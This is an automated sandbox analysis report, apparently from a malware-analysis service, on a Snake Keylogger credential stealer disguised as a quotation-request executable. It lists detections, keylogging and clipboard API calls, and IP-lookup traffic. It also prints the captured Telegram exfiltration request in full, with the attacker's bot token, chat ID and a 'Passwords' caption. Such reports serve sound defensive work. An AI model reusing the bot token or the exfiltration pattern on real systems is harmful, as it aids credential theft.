Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 193.122.6.168:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49706 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49712 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_010422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_010422EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267093791&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1db012dc04f6Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002D02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000006.00000002.3337708543.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7860026700:AAEpF_wLAWoXb_zUOYnzupMyY_Wew8AW-zg/sendDocument?chat_id=5267
Source: RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: nonplacental.exe, 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3338328536.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, nonplacental.exe, 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000006.00000002.3337708543.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode
Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, UltraSpeed.cs	.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01044164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_01044164

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01044164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_01044164
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_002F4164

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01043F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_01043F66

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0103001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0103001C

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0105CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_0105CABC
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_0030CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_0030CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.nonplacental.exe.1d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.nonplacental.exe.1d10000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.nonplacental.exe.2060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.nonplacental.exe.2060000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.3335225665.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.2241145372.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000002.00000002.2114688394.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: nonplacental.exe PID: 2608, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: nonplacental.exe PID: 6508, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00FD3B3A
Source: QUOTATION REQUEST - BQS058.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: QUOTATION REQUEST - BQS058.exe, 00000000.00000003.2094562145.0000000003AC3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_6be678ed-4
Source: QUOTATION REQUEST - BQS058.exe, 00000000.00000003.2094562145.0000000003AC3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_674c0fd1-a
Source: QUOTATION REQUEST - BQS058.exe, 00000000.00000000.2086619933.0000000001084000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1830e430-e
Source: QUOTATION REQUEST - BQS058.exe, 00000000.00000000.2086619933.0000000001084000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_fc4be89f-0
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00283B3A
Source: nonplacental.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: nonplacental.exe, 00000002.00000002.2113400594.0000000000334000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e6ac0fbe-1
Source: nonplacental.exe, 00000002.00000002.2113400594.0000000000334000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e2bd24b6-f
Source: nonplacental.exe, 00000005.00000000.2227361526.0000000000334000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_916b53af-2
Source: nonplacental.exe, 00000005.00000000.2227361526.0000000000334000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_4f761264-2
Source: QUOTATION REQUEST - BQS058.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1c355fe3-f
Source: QUOTATION REQUEST - BQS058.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b745b926-9
Source: nonplacental.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4bdb10e1-6
Source: nonplacental.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_411c0182-8

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION REQUEST - BQS058.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_0103A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0103A1EF

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_01028310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_01028310

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_010351BD
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_002E51BD

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FDE6A0	0_2_00FDE6A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFD975	0_2_00FFD975
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FDFCE0	0_2_00FDFCE0
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF21C5	0_2_00FF21C5
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010503DA	0_2_010503DA
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_010062D2	0_2_010062D2
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF25FA	0_2_00FF25FA
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0100242E	0_2_0100242E
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE66E1	0_2_00FE66E1
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0100878F	0_2_0100878F
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_0102E616	0_2_0102E616
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE8808	0_2_00FE8808
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01006844	0_2_01006844
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01050857	0_2_01050857
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01038889	0_2_01038889
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFCB21	0_2_00FFCB21
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01006DB6	0_2_01006DB6
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE6F9E	0_2_00FE6F9E
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE3030	0_2_00FE3030
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFF1D9	0_2_00FFF1D9
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF3187	0_2_00FF3187
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FD1287	0_2_00FD1287
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF1484	0_2_00FF1484
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE5520	0_2_00FE5520
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF7696	0_2_00FF7696
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE5760	0_2_00FE5760
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF1978	0_2_00FF1978
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01009AB5	0_2_01009AB5
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_01057DDB	0_2_01057DDB
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FFBDA6	0_2_00FFBDA6
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FF1D90	0_2_00FF1D90
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FE3FE0	0_2_00FE3FE0
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_00FDDF00	0_2_00FDDF00
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Code function: 0_2_015FB9D8	0_2_015FB9D8
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_0028E6A0	2_2_0028E6A0
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002AD975	2_2_002AD975
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_0028FCE0	2_2_0028FCE0
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A21C5	2_2_002A21C5
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B62D2	2_2_002B62D2
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_003003DA	2_2_003003DA
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B242E	2_2_002B242E
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A25FA	2_2_002A25FA
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002DE616	2_2_002DE616
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002966E1	2_2_002966E1
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B878F	2_2_002B878F
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00298808	2_2_00298808
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00300857	2_2_00300857
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B6844	2_2_002B6844
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002E8889	2_2_002E8889
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002ACB21	2_2_002ACB21
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002B6DB6	2_2_002B6DB6
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00296F9E	2_2_00296F9E
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00293030	2_2_00293030
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002A3187	2_2_002A3187
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_002AF1D9	2_2_002AF1D9
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00281287	2_2_00281287
